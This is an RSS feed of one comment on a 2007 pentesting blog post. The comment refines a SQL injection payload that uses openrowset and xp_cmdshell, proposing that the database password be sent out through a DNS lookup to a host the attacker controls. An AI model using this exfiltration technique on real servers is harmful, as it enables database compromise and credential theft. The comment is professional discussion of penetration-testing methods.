<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>
<channel>
	<title>Comments on: Ten Cents</title>
	<atom:link href="http://www.notsosecure.com/folder2/2007/04/14/ten-cents/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.notsosecure.com/folder2/2007/04/14/ten-cents/</link>
	<description>From Pentesters To Pentesters</description>
	<pubDate>Sat, 11 Oct 2008 22:29:58 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.2</generator>
		<item>
		<title>By: pentestmonkey</title>
		<link>http://www.notsosecure.com/folder2/2007/04/14/ten-cents/#comment-53</link>
		<dc:creator>pentestmonkey</dc:creator>
		<pubDate>Sat, 14 Apr 2007 12:15:30 +0000</pubDate>
		<guid isPermaLink="false">http://www.notsosecure.com/folder2/2007/04/14/ten-cents/#comment-53</guid>
		<description>Quoting:

&lt;blockquote&gt;
select null from openrowset(â€™sqloledbâ€™,â€;â€™saâ€™;'[password]â€™,'exec
master..xp_cmshell â€ping my_hostâ€â€™). I will confirm this sometime later.

&lt;/blockquote&gt;



I thought of a possible refinement to your idea.  Maybe you could get
the query to send a DNS request containing the password.

Instead of:

exec master..xp_cmshell "ping myhost"

Do:

exec master..xp_cmshell "ping [password].notsosecure.com"

Listen for the DNS request on your nameserver.  Outbound ping might be
blocked, but outbound DNS is less likely to be blocked.

Ref: http://pentestmonkey.net/blog/mssql-dns/


Just a thought.</description>
		<content:encoded><![CDATA[<p>Quoting:</p>
<blockquote><p>
select null from openrowset(â€™sqloledbâ€™,â€;â€™saâ€™;&#8217;[password]â€™,&#8217;exec<br />
master..xp_cmshell â€ping my_hostâ€â€™). I will confirm this sometime later.</p>
</blockquote>
<p>I thought of a possible refinement to your idea.  Maybe you could get<br />
the query to send a DNS request containing the password.</p>
<p>Instead of:</p>
<p>exec master..xp_cmshell &#8220;ping myhost&#8221;</p>
<p>Do:</p>
<p>exec master..xp_cmshell &#8220;ping [password].notsosecure.com&#8221;</p>
<p>Listen for the DNS request on your nameserver.  Outbound ping might be<br />
blocked, but outbound DNS is less likely to be blocked.</p>
<p>Ref: <a href="http://pentestmonkey.net/blog/mssql-dns/" rel="nofollow">http://pentestmonkey.net/blog/mssql-dns/</a></p>
<p>Just a thought.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
